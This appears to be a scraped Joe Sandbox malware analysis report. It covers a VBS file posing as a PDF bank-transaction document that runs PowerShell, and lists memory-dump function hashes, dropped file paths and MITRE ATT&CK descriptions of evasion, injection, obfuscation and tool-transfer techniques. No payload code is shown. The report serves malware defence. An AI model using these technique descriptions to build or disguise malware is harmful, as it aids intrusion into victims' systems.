tPq, xrefs: 074D1D83
4'q, xrefs: 074D1E3F
4'q, xrefs: 074D20FC
$q, xrefs: 074D1CE5
4'q, xrefs: 074D1E33
4'q, xrefs: 074D2106
tPq, xrefs: 074D1D8F
$q, xrefs: 074D1E0E
$q, xrefs: 074D1D01

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$tPq$tPq$$q$$q$$q$$q
API String ID: 0-3456696661
Opcode ID: eac70acf51573ec17e8246506d4e935f969159ee74c71fb9e330c88b430a0d52
Instruction ID: 9041bac823582d9796e4c311b96ad9e165dc923f9543439384f6bf1c847a19f5
Opcode Fuzzy Hash: eac70acf51573ec17e8246506d4e935f969159ee74c71fb9e330c88b430a0d52
Instruction Fuzzy Hash: 12E125B1B002099FDB259B65D8207EBBBE2BFC9211F15C46BD9858B341DB31DD42CBA1

Function 074D2650 Relevance: 12.8, Strings: 10, Instructions: 308COMMON

Download Yara Rule

Strings

$q, xrefs: 074D2867
4'q, xrefs: 074D2932
4'q, xrefs: 074D2926
$q, xrefs: 074D2909
$q, xrefs: 074D28FD
4'q, xrefs: 074D2754
$q, xrefs: 074D28CC
$q, xrefs: 074D28BC
4'q, xrefs: 074D2748
$q, xrefs: 074D2846

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q
API String ID: 0-4104424984
Opcode ID: e09e236d428c4173575049e95cd3506cd6677bc985c1c1f43539c4dae7b53117
Instruction ID: bd2f9242161c6d4712e1506a7e69b5777adf1e11268437d7dff3b3daa88afff9
Opcode Fuzzy Hash: e09e236d428c4173575049e95cd3506cd6677bc985c1c1f43539c4dae7b53117
Instruction Fuzzy Hash: 35A14CB170430A9FDB354A6594207EB7BE2BF86211F1884BBE885CB351DBB5CC42C7A1

Function 074D9560 Relevance: 9.2, Strings: 7, Instructions: 489COMMON

Download Yara Rule

Strings

4'q, xrefs: 074D97D1
tPq, xrefs: 074D95DD
$q, xrefs: 074D9598
$q, xrefs: 074D95A4
tPq, xrefs: 074D95E9
4'q, xrefs: 074D97C7
$q, xrefs: 074D9572

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$tPq$tPq$$q$$q$$q
API String ID: 0-2432477355
Opcode ID: e7cbaa4a77d35bc7dad87e59732e1bcc435e84e7b86ce2c423563b2f825d5641
Instruction ID: d2179044b12f46db2149b43c4f5fb481a985bd0e1811486f3bed6542dbecbc10
Opcode Fuzzy Hash: e7cbaa4a77d35bc7dad87e59732e1bcc435e84e7b86ce2c423563b2f825d5641
Instruction Fuzzy Hash: 45F138B2B043159FDB148AA984216EBBBE6EFC6211F18C4BBD485CF351DA31EC46C791

Function 074DC8B9 Relevance: 7.7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

Strings

tPq, xrefs: 074DCAB1
d%q, xrefs: 074DCA77
d%q, xrefs: 074DCADB
4'q, xrefs: 074DCB4F
$q, xrefs: 074DC998
d%q, xrefs: 074DCAE5

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$d%q$d%q$d%q$tPq$$q
API String ID: 0-2531934922
Opcode ID: 756d97ae403739b0b44603ee959acd991d2c3a18d06403a9da41c2ad7876109a
Instruction ID: efc5dd28c33d766b07fe870b45ac9c193abdca6b4099f279110940de0b9e1268
Opcode Fuzzy Hash: 756d97ae403739b0b44603ee959acd991d2c3a18d06403a9da41c2ad7876109a
Instruction Fuzzy Hash: 8E51D2B0A14306DFDB24CF14D4A0BEABBA2AF45211F1884D7E8859B395D731DD41C7B1

Function 074DD808 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

tPq, xrefs: 074DD9A2
$q, xrefs: 074DD883
4'q, xrefs: 074DDADA
$q, xrefs: 074DD8A4
$q, xrefs: 074DDA62

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$tPq$$q$$q$$q
API String ID: 0-838716513
Opcode ID: 1628765e0fee98bf7f3b99969db63fc858beb0d2d919943474a674332c144cfc
Instruction ID: 530e79f4f9e8e8941a9d1fdff4e7cebc98a4d69a4080e4bcc5ef9cc55ddb89a1
Opcode Fuzzy Hash: 1628765e0fee98bf7f3b99969db63fc858beb0d2d919943474a674332c144cfc
Instruction Fuzzy Hash: CC6189B0F1420AEBDB248E14C5657FBB7A2AF86315F1884A7E8955B390C771DC81CFA1

Function 074D1C69 Relevance: 6.4, Strings: 5, Instructions: 127COMMON

Download Yara Rule

Strings

$q, xrefs: 074D1DFE
tPq, xrefs: 074D1D83
$q, xrefs: 074D1CE5
4'q, xrefs: 074D1E33
$q, xrefs: 074D1D01

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$tPq$$q$$q$$q
API String ID: 0-838716513
Opcode ID: c3ed8db2763fc08a20b604d7ac74eb0bacb4b8108c58ae1bc522fdd335425ac0
Instruction ID: b06b6da2876d2e07e5fb014f939bec0b5ca48d682e7a4afc043c5a18ac9c7565
Opcode Fuzzy Hash: c3ed8db2763fc08a20b604d7ac74eb0bacb4b8108c58ae1bc522fdd335425ac0
Instruction Fuzzy Hash: 7A41E6B0A04349EFDB258E15C4717E6BBB1AF8A210F1B859BEC959F292C731DC41CB91

Function 074DC9FE Relevance: 6.3, Strings: 5, Instructions: 85COMMON

Download Yara Rule

Strings

tPq, xrefs: 074DCAB1
d%q, xrefs: 074DCA77
d%q, xrefs: 074DCADB
4'q, xrefs: 074DCB4F
d%q, xrefs: 074DCAE5

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$d%q$d%q$d%q$tPq
API String ID: 0-706544200
Opcode ID: 37a81ce23c0362186e8749fe06f87d83fb1ed75769ef86d773fbedc0d95baf73
Instruction ID: 3fb7e40e202c0d339aa25be55476d8f6778a03c6e4221ae8eb47a3a8ee2f6fff
Opcode Fuzzy Hash: 37a81ce23c0362186e8749fe06f87d83fb1ed75769ef86d773fbedc0d95baf73
Instruction Fuzzy Hash: E631A7B4B10215DFDB24DF54D4A0BAAB7A2BB8C710F18C596E885AF354C731DC42CBA1

Function 074D00F0 Relevance: 5.3, Strings: 4, Instructions: 314COMMON

Download Yara Rule

Strings

tPq, xrefs: 074D0382
4'q, xrefs: 074D01D8
4'q, xrefs: 074D01E4
tPq, xrefs: 074D0376

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$tPq$tPq
API String ID: 0-1392854178
Opcode ID: 078a40665c41582de27ebee49f5e22d34f88e26d979ff096a615df92abbcfcb1
Instruction ID: 677fc8a140c34aeac1328bb6b16d05077d3868fddc72907e7bf0850dd18c8272
Opcode Fuzzy Hash: 078a40665c41582de27ebee49f5e22d34f88e26d979ff096a615df92abbcfcb1
Instruction Fuzzy Hash: 2BA13AB1B053158FD7248B6894257EBBBA2AFC6310F18C46BD985CB361DA71CC82C791

Function 074D1078 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$q, xrefs: 074D10D4
$q, xrefs: 074D10A6
$q, xrefs: 074D108A
$q, xrefs: 074D10E0

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q
API String ID: 0-4102054182
Opcode ID: 54f2b14f6dda4e76e7eaf3d62a9141958734cd34db43fe1178f19d5823cf3ec6
Instruction ID: 60ee42950a0e51a61d2d1e7091895d559e7ff7d18b93da74eb317e222eae94c4
Opcode Fuzzy Hash: 54f2b14f6dda4e76e7eaf3d62a9141958734cd34db43fe1178f19d5823cf3ec6
Instruction Fuzzy Hash: 54218BB130430AEBEB34256A68207AB7796ABC5711F25843BED85C7785DD36CC418361

Function 074D1B09 Relevance: 5.1, Strings: 4, Instructions: 52COMMON

Download Yara Rule

Strings

$q, xrefs: 074D1B5E
4'q, xrefs: 074D1B73
4'q, xrefs: 074D1B7F
$q, xrefs: 074D1B52

Memory Dump Source

Source File: 0000000C.00000002.1621657786.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$$q$$q
API String ID: 0-3199993180
Opcode ID: 96d3b87996b3aa07211c67871f354ee5c46f4c45a1a4d9b63e63fe1c96042e35
Instruction ID: f2b18bc40f8b0fe6ce5a71ba5c79730853f3a1f220c507706b7776e5f6ad3108
Opcode Fuzzy Hash: 96d3b87996b3aa07211c67871f354ee5c46f4c45a1a4d9b63e63fe1c96042e35
Instruction Fuzzy Hash: 3901D45170D3CA5FC727123828311A66FB29BC355032F82E7E881CF697E8144D06C7A7

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report pko_trans_details_20240909_105339#U00b7pdf.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jk3voiqc.xmh.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mdwt1c4t.ovm.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rcw3c0ru.vjx.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rj0vrkm1.bqf.ps1

C:\Users\user\AppData\Roaming\Depraves.Ter

Static File Info

General

File Icon

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
pko_trans_details_20240909_105339#U00b7pdf.vbs

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre